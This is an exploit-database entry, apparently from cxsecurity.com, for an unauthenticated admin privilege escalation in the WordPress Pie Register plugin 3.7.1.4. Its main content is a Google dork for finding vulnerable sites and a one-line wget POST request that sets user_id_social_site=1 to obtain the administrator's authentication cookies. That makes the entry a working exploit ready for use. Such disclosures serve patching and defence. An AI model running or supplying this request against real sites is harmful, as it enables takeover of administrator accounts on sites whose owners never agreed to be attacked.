WordPress Pie Register 3.7.1.4 Privilege Escalation

2021.10.11
Credit: Lotfi13-DZ
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated) # Google Dork: inurl:/plugins/pie-register/ # Date: 08.10.2021 # Exploit Author: Lotfi13-DZ # Vendor Homepage: https://wordpress.org/plugins/pie-register/ # Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip # Version: <= 3.7.1.4 # Tested on: ubuntu Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin). Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top